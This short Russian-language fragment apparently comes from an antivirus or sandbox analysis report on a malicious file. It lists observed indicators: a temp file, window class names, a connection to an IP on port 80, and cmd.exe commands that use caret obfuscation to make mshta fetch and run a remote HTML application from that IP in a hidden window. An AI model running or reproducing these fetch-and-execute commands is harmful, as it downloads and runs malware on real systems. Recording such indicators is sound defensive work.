Техническая информация
- '<SYSTEM32>\cmd.exe' /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
- C:\Documents\user\locals~1\temp\~dfa3be.tmp
- '91.##0.118.168':80
- ClassName: 'MsoHelp11' WindowName: ''
- ClassName: 'AgentAnim' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' http://91.240.118.168/oo/aa/se.html